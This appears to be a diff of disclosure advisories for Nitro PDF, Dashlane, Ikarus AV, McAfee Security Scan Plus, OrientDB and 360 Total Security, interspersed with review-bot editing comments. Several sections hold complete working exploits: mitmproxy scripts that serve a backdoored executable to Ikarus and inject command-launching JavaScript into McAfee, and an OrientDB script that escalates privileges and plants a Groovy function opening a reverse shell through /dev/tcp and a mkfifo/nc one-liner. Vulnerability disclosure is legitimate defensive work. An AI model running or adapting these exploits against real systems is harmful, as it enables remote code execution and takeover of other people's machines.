3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF
```
## JPEG2000 npdf.dll Use-After-Free
When parsing a malformed embedded JPEG2000 image into a PDF the process will destroy an object in memory, forcing a pointer to be reused after it has been free. The reuse functions are located in the npdf.dll.
when browsing a folder with the mutated files and attaching to the newly launched dllhost.exe, WinDbg will show:
```
...
CNitroPDFThumbProvider::GetThumbnail - prepare device to renderCNitroPDFThumbProvider::GetThumbnail - render the page(1010.1038): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
npdf!CxRect2::Width+0x4f6f6:
000007fe`e592dd16 488b01 mov rax,qword ptr [rcx] ds:feeefeee`feeefeee=????????????????
...
...
000007fe`e592dd16 488b01 mov rax,qword ptr [rcx] ds:feeefeee`feeefeee=????????????????
000007fe`e592dd19 ff90d0000000 call qword ptr [rax+0D0h]
...
```
When opening the file with Nitro PDF Reader 32 BIT, WinDbg will show ex. :
```
...
(d7c.1210): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=05fffda8 ebx=0133115c ecx=16cf6c38 edx=013311c0 esi=00000000 edi=00000000
eip=4f532f32 esp=01145614 ebp=01145628 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
4f532f32 ?? ???
...
1
2
3
4
5
6
7
8
9
...
(d7c.1210): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=05fffda8 ebx=0133115c ecx=16cf6c38 edx=013311c0 esi=00000000 edi=00000000
eip=4f532f32 esp=01145614 ebp=01145628 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
4f532f32 ?? ???
...
eip is overwritten with random memory.
Disassembly of the prior call:
...
68dbff59 8b4af0 mov ecx,dword ptr [edx-10h]
68dbff5c 85c9 test ecx,ecx
68dbff5e 7409 je npdf!TerminateApp+0xb7d99 (68dbff69)
68dbff60 8b01 mov eax,dword ptr [ecx]
68dbff62 ff5010 call dword ptr [eax+10h]
...
1
2
3
4
5
6
7
...
68dbff59 8b4af0 mov ecx,dword ptr [edx-10h]
68dbff5c 85c9 test ecx,ecx
68dbff5e 7409 je npdf!TerminateApp+0xb7d99 (68dbff69)
68dbff60 8b01 mov eax,dword ptr [ecx]
68dbff62 ff5010 call dword ptr [eax+10h]
...
call stack:
...
# ChildEBP RetAddr Args to Child
00 01145610 68dbff65 694dc564 0133115c 01145678 0x4f532f32
01 01145628 691f7bab 0114567c 00000000 00000000 npdf!TerminateApp+0xb7d95
02 01145650 691f7a42 0114567c 03a1aa80 013311c0 npdf!CxRect2::Width+0x5220b
03 0114568c 691f7ab7 00000000 00000001 691ed76b npdf!CxRect2::Width+0x520a2
04 011456a0 6938952b 68c70000 00000000 00000001 npdf!CxRect2::Width+0x52117
05 011456e0 693894b2 68c70000 00000000 00000001 npdf!CxRect2::Width+0x1e3b8b
06 011456f4 77b092e0 68c70000 00000000 00000001 npdf!CxRect2::Width+0x1e3b12
07 01145714 77b29da4 69389496 68c70000 00000000 ntdll!RtlQueryEnvironmentVariable+0x241
08 011457b8 77b29c46 0133da3c 77b096e5 0133da40 ntdll!LdrShutdownProcess+0x141
09 011457cc 76ca79c5 00000000 77e8f3b0 ffffffff ntdll!RtlExitUserProcess+0x74
0a 011457e0 693926a6 ffffffff 01145834 69392aae kernel32!ExitProcess+0x15
0b 011457ec 69392aae ffffffff bf850c3a 16cf003a npdf!CxRect2::Width+0x1ecd06
0c 01145834 69392ad2 ffffffff 00000000 00000000 npdf!CxRect2::Width+0x1ed10e
0d 01145848 6916a9c7 ffffffff 690bb918 bf850c62 npdf!CxRect2::Width+0x1ed132
0e 0114586c 690ff453 bf850cb6 16cf003a 16cf0030 npdf!CxImage::Thumbnail+0x14907
0f 011458b8 690e7319 16cf003a 00000200 16cefdc0 npdf!CxImageJAS::Encode+0x5abb3
10 01145920 690dfc47 00000000 00000000 bf850d7a npdf!CxImageJAS::Encode+0x42a79
11 01145974 6907c89d 1691a5b0 00000000 bf85f4ca npdf!CxImageJAS::Encode+0x3b3a7
12 0114a0c4 6907da8e 0114aab4 0114ab04 bf85f556 npdf!CxImagePNG::user_write_data+0x6bc1d
13 0114a158 68eb0f95 0114aae4 00034627 00000000 npdf!CxImagePNG::user_write_data+0x6ce0e
14 0114a178 68eb1660 0114aae4 00034627 00000000 npdf!CxImage::~CxImage+0x88f35
15 0114a1d8 68eb0d1a 00000000 0404004c 0114aae4 npdf!CxImage::~CxImage+0x89600
16 0114aa80 68dea973 0114aae4 00034627 00000000 npdf!CxImage::~CxImage+0x88cba
17 0114ab28 68dea846 00000000 04080055 bf85ffb2 npdf!TerminateApp+0xe27a3
18 0114abbc 68dea566 00000000 04090034 bf85ffea npdf!TerminateApp+0xe2676
19 0114abe4 68d29e9b 00000000 04090034 00000002 npdf!TerminateApp+0xe2396
1a 0114ac0c 68d29952 00000000 04090034 00000002 npdf!TerminateApp+0x21ccb
1b 0114ac24 68f93f9b 00000000 04090034 00000002 npdf!TerminateApp+0x21782
1c 0114ac5c 68efe9c0 00001de2 00000ce4 000009f6 npdf!CxImage::~CxImage+0x16bf3b
1d 0114b6dc 68fa54c8 0114b77c bf85953e 061e8998 npdf!CxImage::~CxImage+0xd6960
1e 0114c130 68e3e6a6 16ba3598 00000000 00000000 npdf!CxImage::~CxImage+0x17d468
1f 0114c168 68e4133d 16c8c150 0114c1b0 16ba3438 npdf!CxImage::~CxImage+0x16646
20 0114c1a8 68e37ca2 061e8998 bf859df6 16ba3438 npdf!CxImage::~CxImage+0x192dd
21 0114c9f8 68e5b509 bf859a92 0575f818 16ba3438 npdf!CxImage::~CxImage+0xfc42
22 0114ce9c 68e5a956 0114d730 68e4016b 00000000 npdf!CxImage::~CxImage+0x334a9
23 0114cea4 68e4016b 00000000 014e4020 0114e14c npdf!CxImage::~CxImage+0x328f6
24 0114d730 68d786df 4b011fcc 0114e0fc 00000000 npdf!CxImage::~CxImage+0x1810b
25 0114dff8 68d7a771 4b011fcc 0114e0fc 00000000 npdf!TerminateApp+0x7050f
26 0114e020 014e6381 16bc08e8 0114e0f4 bc2b49e1 npdf!TerminateApp+0x725a1
27 0114e634 014eb65d 16ca1778 5b012454 0114e678 NitroPDF!CxIOFile::Write+0x92521
28 0114ee9c 73f8b443 0114eeb8 bf88cba9 16ca1778 NitroPDF!CxIOFile::Write+0x977fd
29 0114ef1c 73f9ae0c bf88cb9d 16ca1778 16ca1778 mfc120u+0x22b443
2a 0114efe0 73f9a901 0000000f 00000000 00000000 mfc120u+0x23ae0c
2b 0114f000 73f98f33 0000000f 00000000 00000000 mfc120u+0x23a901
2c 0114f070 73f99155 16ca1778 004509c0 0000000f mfc120u+0x238f33
2d 0114f090 73e97e8e 004509c0 0000000f 00000000 mfc120u+0x239155
2e 0114f0cc 76fa62fa 004509c0 0000000f 00000000 mfc120u+0x137e8e
2f 0114f0f8 76fa6d3a 73e97e5a 004509c0 0000000f USER32!gapfnScSendMessage+0x332
30 0114f170 76fa6de8 00000000 73e97e5a 004509c0 USER32!GetThreadDesktop+0xd7
31 0114f1cc 76fa6e44 02055d40 00000000 0000000f USER32!GetThreadDesktop+0x185
32 0114f208 77ae010a 0114f220 00000000 0114f274 USER32!GetThreadDesktop+0x1e1
33 0114f284 76fa788a 73e97e5a 00000000 0114f2c0 ntdll!KiUserCallbackDispatcher+0x2e
34 0114f294 73f886f2 012fa0f8 00000001 0178ef40 USER32!DispatchMessageW+0xf
35 0114f2c0 0153365e bc2b5389 ffffffff 0178ef40 mfc120u+0x2286f2
36 0114fc5c 73fabde4 00000000 00000020 00000001 NitroPDF!CxIOFile::Write+0xdf7fe
37 0114fc70 0164e72d 013e0000 00000000 012b3120 mfc120u+0x24bde4
38 0114fcbc 76ca336a 7efde000 0114fd08 77b09882 NitroPDF!CxImageJPG::CxExifInfo::process_SOFn+0x637dd
39 0114fcc8 77b09882 7efde000 741ca300 00000000 kernel32!BaseThreadInitThunk+0x12
3a 0114fd08 77b09855 0164e7ab 7efde000 ffffffff ntdll!RtlInitializeExceptionChain+0x63
3b 0114fd20 00000000 0164e7ab 7efde000 00000000 ntdll!RtlInitializeExceptionChain+0x36
...
```
## reuse function, npdf.dll:
```
;----------------------------------------------------------------------------------------------------
1014FF59 L1014FF59:
1014FF59 8B4AF0 mov ecx,[edx-10h]
1014FF5C 85C9 test ecx,ecx
1014FF5E 7409 jz L1014FF69
1014FF60 8B01 mov eax,[ecx] <--- ecx -> junk
1014FF62 FF5010 call [eax+10h] <--- Crash
1014FF65 85C0 test eax,eax
1014FF67 750C jnz L1014FF75
1014FF69 L1014FF69:
1014FF69 E8123D4300 call SUB_L10583C80
1014FF6E 8BC8 mov ecx,eax
1014FF70 8B10 mov edx,[eax]
1014FF72 FF5210 call [edx+10h]
1014FF75 L1014FF75:
1014FF75 8B4D08 mov ecx,[ebp+08h]
1014FF78 50 push eax
1014FF79 8B03 mov eax,[ebx]
1014FF7B 56 push esi
1014FF7C 8D0478 lea eax,[eax+edi*2]
1014FF7F 50 push eax
1014FF80 E83BC2FFFF call SUB_L1014C1C0
1014FF85 8B4508 mov eax,[ebp+08h]
1014FF88 5F pop edi
1014FF89 5E pop esi
1014FF8A 5B pop ebx
1014FF8B 8BE5 mov esp,ebp
1014FF8D 5D pop ebp
1014FF8E C20C00 retn 000Ch
;----------------------------------------------------------------------------------------------------
```
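Review bot: the WinDbg excerpts are pasted twice with a stray line-number gutter between the copies: L3381-L3387 is repeated at L3399-L3405 with "1".."9" in between, and L3410-L3414 is repeated at L3424-L3428 with "1".."7"; keep one copy of each. "This report contain" (L3278) should read "contains". The list on L3270-L3277 names seven issues while the report covers three (L3279-L3281) and cites two CVEs (L3288-L3289); state which CVE belongs to which issue. The AquaSnap sentence (L3269) is vendor marketing copied into the summary and adds nothing to the advisory.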


@ -0,0 +1,23 @@
## Vulnerability Summary
The following advisory describes a DLL Hijacking vulnerability found in Dashlane.
Dashlane is “a password manager app and secure digital wallet. The app is available on Mac, PC, iOS and Android. The apps premium feature enables users to securely sync their data between an unlimited number of devices on all platforms.”
## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We have informed Dashlane of the vulnerability, their answer was: “Since there are many ways to load DLLs/code in a process under Windows, we are currently rewriting part of the installer to install in Program Files (we use %appdata% for the non admin users like many other applications), and you can already replace DLLl/exe if you are privileged to write in the user %appdata%/…/dashlane directory, we wont change the current way of loading DLLs in the short term.”
At this time there is no solution or workaround for this vulnerability.
CVE: CVE-2017-11657
## Vulnerability details
When Dashlane starts on a Windows machine it tries to load a DLL (WINHTTP.dll) from the C:\Users\user\AppData\Roaming\Dashlane\ directory, if a malicious attacker puts the DLL in that directory Dashlane will load it and run the code found in it without giving the user any warning of it.
This happens because:
Dashlane does not provide the file WINHTTP.dll.
Writing in %appdata% doesnt require any special privileges, the file called WINHTTP.dll can be placed in the path C:\Users\user\AppData\Roaming\Dashlane\.
Since Dashlane can require admin privileges, an attacker can place the nwinhttp.dll and cause script/command execution as the current user (usually admin).
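Review bot: "nwinhttp.dll" (L3546) should read "WINHTTP.dll" to match L3542 and L3544-L3545. The three reasons under "This happens because:" (L3544-L3546) are a list and should be formatted as one. Missing apostrophes: "doesnt" (L3545), "wont" (L3538). The last point conflates two things: "cause script/command execution as the current user (usually admin)" should say whether the planted DLL is loaded by an elevated Dashlane process or only within the user's own session, because that decides whether this is code execution or privilege escalation.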


@ -0,0 +1,229 @@
## Vulnerability summary
The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7.
KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent intrusion and protect yourself against cyber-criminals by choosing IKARUS anti.virus, powered by the award-winning IKARUS scan.engine. It is among the best in the world, detecting new and existing threats every day. ”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor Response
Update 1
CVE: CVE-2017-15643
The vendor has released patches to address these vulnerabilities.
For more information: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/
## Vulnerability details
An active network attacker (MiTM) can achieve remote code execution on a machine that runs Ikraus Anti Virus.
Ikarus AV for windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files.
Also ikarus checks for a update version number which can be incremented to goad the process to update.
The update process executable in ikarus called guardxup.exe
guardxup.exe, send over port 80, the following request for update:
```
GET /cgi-bin/virusutilities.pl?A=7534ED66&B=6.1.1.0.11.1.256.7601&C=1005047.2013019.2001016.98727&F=4.5.2%3bO=0%3bSP=0&E=WD-194390-VU HTTP/1.1
Accept: */*
User-Agent: virusutilities(6.1,0,1005047)
Host: updates.ikarus.at
Connection: close
```
The server will respond with:
```
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 04:51:05 GMT
Server: Apache/2.4.10 (Debian) mod_perl/2.0.9dev Perl/v5.20.2
Content-Disposition: inline; filename=virusutilities
Content-Length: 306
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
<url>
full http://mirror04.ikarus.at/updates/
diff http://mirror06.ikarus.at/updates/
</url>
<up>
antispam_w64 001000076
antispam 001000076
update 001005047
virusutilities 002013019
t3modul_w64 002001016
t3modul 002001016
sdb 000007074
t3sigs 000098727
</up>
<dependence>
t3modul
</dependence>
```
```
Through the proxy we will modify the response and add 1 to the update value and forward the response to the client.
Then the client will request the update via this url: http://mirror04.ikarus.at/updates/guardxup001005048.full
The ikarus server will respond with a 404:
```
HTTP/1.1 404 Not Found
Server: nginx/1.6.2
Date: Sun, 23 Oct 2016 04:53:05 GMT
Content-Type: text/html
Content-Length: 168
Connection: close
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
```
But we will modify the response with a IKUP format:
```
Bytes: 0x0 - 0x3 == IKUP # header
Bytes: 0x4 - 0x7 == 0x0s
Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header
Bytes: 0x20 - 0x23 == update value in little endian (script fixes it up)
Bytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)
Bytes: 0x28 -> pointer to MZ header == 0x0s
Bytes: 'pointer to MZ header' -> ? == appended exe
```
Then we will forward to the update to the client, where it replaces guardxup.exe with our executable.
## Proof of concept
Install mitmproxy 0.17:
```
pip install mitmproxy==0.17
```
To use this script, you'll need to man-in-the-middle port 80 traffic from the client with a transparent proxy.
Set your firewall rules to redirect port 80 traffic to port 8080:
```
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
```
and execute the script as follows:
```
./poc.py file_to_deploy.exe
```
```
#!/usr/bin/env python2
import os
try:
    from mitmproxy import controller, proxy, platform
    from mitmproxy.proxy.server import ProxyServer
except:
    from libmproxy import controller, proxy, platform
    from libmproxy.proxy.server import ProxyServer
import re
import struct
import sys
import zlib
import bz2


class IkarusPOC(controller.Master):
    def __init__(self, server, backdoored_file):
        controller.Master.__init__(self, server)
        self.ikarus = {}
        self.crc_file = 0
        self.backdoored_file = backdoored_file
        self.to_replace = 0
        self.already_patched = 0
        self.update_number = 0

    def win_header(self):
        # IKUP header: magic, zeros, pointer (0x3C) to the appended MZ image
        self.update_header = "\x49\x4B\x55\x50\x00\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += struct.pack("<I", self.to_replace)  # update number
        self.update_header += struct.pack("<I", self.crc_file)  # checksum
        self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += "\x00\x00\x00\x00"

    def run(self):
        try:
            return controller.Master.run(self)
        except KeyboardInterrupt:
            self.shutdown()

    def crc_stream(self, a_string):
        prev = 0
        return zlib.crc32(a_string, prev) & 0xFFFFFFFF

    def crc(self, some_file):
        prev = 0
        for eachLine in open(some_file, "rb"):
            prev = zlib.crc32(eachLine, prev)
        self.crc_file = prev & 0xFFFFFFFF
        print "[*] crc_file", self.crc_file

    def handle_request(self, flow):
        hid = (flow.request.host, flow.request.port)
        flow.reply()

    def handle_response(self, flow):
        print "[*] flow.request.host:", flow.request.host
        if "cgi-bin/imsa-lite.pl" in flow.request.path and "Dalvik" in flow.request.headers['User-Agent'] and self.already_patched <= 2:
            content = flow.reply.obj.response.content
            p = re.compile("antispam[\s|\t].*\n")
            result = p.search(content)
            the_result = result.group(0)
            original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
            if self.update_number == 0:
                self.update_number = original_update_number
                self.to_replace = self.update_number + 1
            content = content.replace(str(original_update_number), str(self.to_replace))
            flow.reply.obj.response.content = content
        if "cgi-bin/virusutilities.pl" in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched <= 2:
            print "[*] Found update response, modifying..."
            content = flow.reply.obj.response.content
            p = re.compile("update[\s|\t].*\n")
            result = p.search(content)
            the_result = result.group(0)
            original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
            if self.update_number == 0:
                self.update_number = original_update_number
                self.to_replace = self.update_number + 1
            print '[*] Update_number', self.update_number
            print '[*] Replace number', self.to_replace
            content = content.replace(str(original_update_number), str(self.to_replace))
            print "[*] Updated content", content
            flow.reply.obj.response.content = content
        if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched <= 2:
            print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'
            self.crc(self.backdoored_file)
            self.win_header()
            with open(self.backdoored_file, 'rb') as f:
                file_out = f.read()
            content = self.update_header + file_out
            with open('/tmp/update_test.full', 'wb') as f:
                f.write(content)
            flow.reply.obj.response.content = content
            flow.reply.obj.response.status_code = 200
            self.already_patched += 1
        flow.reply()


config = proxy.ProxyConfig(port=8080, mode='transparent')
server = ProxyServer(config)
m = IkarusPOC(server, sys.argv[1])
m.run()
```

@ -0,0 +1,84 @@
## Vulnerability Summary
The following advisory describes a Remote Code Execution vulnerability found in McAfee Security Scan Plus. An active network attacker can launch a man-in-the-middle attack on a plaintext HTTP response to the client and run any executable residing on the system with the privileges of the logged-in user.
McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.
## Credit
An independent security research company, Silent Signal, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability.
For more information: https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714
CVE: CVE-2017-3897
## Vulnerability details
McAfee Security Scan Plus retrieves promotional and UI design information from different mcafee.com domains and displays them to the user, typically in the main application window.
The vulnerability is caused by multiple factors:
Information is retrieved over plaintext HTTP that can be trivially modified by an active network attacker.
McAfee Security Scan Plus relies on the MCBRWSR2.DLL library to display HTML content. The library exposes the LaunchApplication() JavaScript API, which executes arbitrary commands on the affected system.
After each scan, McAfee Security Scan Plus downloads a UI element indicating the “protection level” of the target from the following URL:
```
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
```
The following screenshot shows the placeholder of the web content while it is loaded (marked with red):
Although the original response redirects to a secure HTTPS URL (and server certificates are verified by the client), from a man-in-the-middle position it is possible to replace the redirection message with an HTTP response indicating success and containing the call to the LaunchApplication() JavaScript API:
```
<script>
window.external.LaunchApplication("c:\\windows\\system32\\calc.exe", "");
</script>
```
The above JavaScript executes the Windows Calculator (without arguments) with the privileges of the logged-in user (on the user's desktop). The request is made every time the user initiates a scan or when a scan is initiated automatically; by default the product is configured for weekly scans, and the exact time depends on the time of installation.
## Proof of Concept
```
#!/usr/bin/env python3
#
# HTTP proxy mode:
# mitmproxy -s mcsploit_inline.py --ignore '.*'
#
# Transparent proxy mode:
# mitmproxy -s mcsploit_inline.py -T
#
from mitmproxy import ctx, http
import requests
import time

COMMAND = "c:\\\\windows\\\\system32\\\\calc.exe"
CMDARGS = ""


def response(flow):
    if flow.request.scheme == "http" and (flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url):
        if flow.response.status_code == 302:
            ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)")
            https_url = flow.request.url.replace("http://", "https://")
            r = requests.get(https_url, headers=flow.request.headers, verify=False)
            if "text/html" not in r.headers['content-type']:
                return
            contents = r.text
            contents = contents.replace("</head>", "<script>try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}</script></head>" % (COMMAND, CMDARGS))
            flow.response = http.HTTPResponse.make(200, bytes(contents, encoding="utf-8"), {"Content-Type": "text/html; charset=utf-8", "Expires": "-1"})
            return
        try:
            if flow.response.headers["content-type"] == "text/javascript":
                ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)")
                inject = "try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}\n" % (COMMAND, CMDARGS)
                try:
                    flow.response.contents = inject + flow.response.contents
                except AttributeError:
                    ctx.log("[-] [MCSPLOIT] No content in the original response!")
                    pass
        except KeyError:
            pass
```

@ -0,0 +1,216 @@
## Vulnerability Summary
The following advisory reports a vulnerability in OrientDB that allows users of the product to cause it to execute code.
OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database.
## Credit
An independent security researcher, Francis Alexander, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability and issue CVE-2017-11467.
For more information: https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#security.
## Vulnerability Details
OrientDB uses an RBAC model for its authentication scheme. By default an OrientDB database has 3 roles: admin, writer and reader, each with a user of the same name. These 3 users are assigned by default to every database created on the server.
The privileges of the users are:
admin: access to all functions on the database without any limitation
reader: read-only user. The reader can query any record in the database, but can't modify or delete it. It has no access to internal information, such as the users and roles themselves
writer: same as the reader, but it can also create, update and delete records
The ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permission before a user can display the permissions of users and make other queries associated with oRole permissions.
From version 2.2.x and above, whenever oRole is queried with where, fetchplan or order by statements, this permission is not required and the information is returned to unprivileged users.
Example:
```
select * from oRole order by name;
```
The writer user is created with every database you create. Thus even if the database admin changes the admin user's password, an attacker would still be able to get code execution with the writer user.
Since where, fetchplan and order by are usable, and OrientDB has a feature for executing Groovy functions whose Groovy wrapper has no sandbox and exposes system functionality, any command can be run.
Sample Groovy function:
Command.md
```
def command = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f'
File file = new File("hello.sh")
file.delete()
file << ("#!/bin/bash\n")
file << (command)
def proc = "bash hello.sh".execute()
```
## Proof of Concept
Start Netcat listening on port 8081:
```
nc -lv 8081
```
Run the following:
```
python PoC.py ip [port]    # port defaults to 2480
```
PoC.py
```
import sys
import requests
import json
import string
import random

target = sys.argv[1]
try:
    port = sys.argv[2] if sys.argv[2] else 2480
except:
    port = 2480
url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)


def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


def enum_databases(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
    if req.status_code == 200:
        #print "[+] Database Enumeration successful"
        database = req.json()['databases']
        return database
    return False


def check_version(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
    if req.status_code == 200:
        headers = req.headers['server']
        #print headers
        if "2.2" in headers or "3." in headers:
            return True
    return False


def run_queries(permission,db,content=""):
    databases = enum_databases(target)
    url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])
    priv_enable = ["create","read","update","execute","delete"]
    #query = "GRANT create ON database.class.ouser TO writer"
    for priv in priv_enable:
        if permission == "GRANT":
            query = "GRANT %s ON %s TO writer"%(priv,db)
        else:
            query = "REVOKE %s ON %s FROM writer"%(priv,db)
        req = requests.post(url,data=query,auth=('writer','writer'))
        if req.status_code == 200:
            pass
        else:
            if priv == "execute":
                return True
            return False
    print "[+] %s"%(content)
    return True


def priv_escalation(target,port="2480"):
    print "[+] Checking OrientDB Database version is greater than 2.2"
    if check_version(target,port):
        priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function")
        priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function")
        priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters")
        if priv1 and priv2 and priv3:
            return True
    return False


def exploit(target,port="2480"):
    #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None}
    func_name = random_function_name()
    print func_name
    databases = enum_databases(target)
    reverse_ip = raw_input('Enter the ip to connect back: ')
    query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
    #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file << (\"#!/bin/bash\")\u000a file << (command)\n def proc = \"bash hello.sh\".execute() ","parameters":null}'
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None}
    req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))
    if req.status_code == 201:
        #print req.status_code
        #print req.json()
        func_id = req.json()['@rid'].strip("#")
        #print func_id
        print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)
        req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
        #print req.status_code
        #print req.text
        if req.status_code == 200:
            print "[+] Open netcat at port 8081.."
        else:
            print "[+] Exploitation failed at last step, try running the script again."
            print req.status_code
            print req.text
        #print "[+] Deleting traces.."
        req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
        priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
        priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
        priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")
        #print req.status_code
        #print req.text


def main():
    target = sys.argv[1]
    #port = sys.argv[1] if sys.argv[1] else 2480
    try:
        port = sys.argv[2] if sys.argv[2] else 2480
        #print port
    except:
        port = 2480
    if priv_escalation(target,port):
        exploit(target,port)
    else:
        print "[+] Target not vulnerable"


main()
```

@ -0,0 +1,32 @@
## Vulnerability Summary
The following advisory describes a Privilege Escalation vulnerability found in 360 Total Security.
360 Total Security offers your PC complete protection from Viruses, Trojans and other emerging threats.
Whether you are shopping online, downloading files or chatting with your friends you can be sure that 360 Total Security is there to keep you safe and your computer optimized. Clean-up utility is just one click away to keep your PC in optimal condition.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability and has only provided these details in response to our query on the status: “We will release this patch on 7/7”
CVE: CVE-2017-12653
## Vulnerability Details
When 360 Total Security loads on a Windows machine, its binaries try to load a DLL (Shcore.dll) in order to display correctly on high-DPI displays.
360 Total Security installs Shcore.dll on Windows 8.1 and above, but not on previous versions (for example Windows 7 and XP). The administration components of 360 Total Security nonetheless try to find and load this DLL on Windows 7 too, where it does not exist.
Placing a DLL named Shcore.dll in a directory listed in the PATH system variable causes it to be loaded into the memory space of the 360 software. Loading the DLL inside a 360 administration process gives it administrator privileges.
## Proof of Concept
Install 360 Total Security and optionally update to the latest version.
Log into Windows 7 and create a DLL planting environment.
The easiest way is to install Python for Windows.
Select “Add Python to the path” in the installer (the most common install option).
Log in as a totally unprivileged user and copy the DLL, renamed to Shcore.dll, to C:\Python27 (in case you used Python as the DLL planting vector).
Now there are two options to trigger the vulnerability:
In case the administrator is not logged in, log in as administrator (fastest way).
If the administrator is already logged in, it will take several minutes. The reason is that 360 periodically launches processes in the background; any of them will trigger the vulnerability and execute the code. Tests have shown this is a matter of minutes.
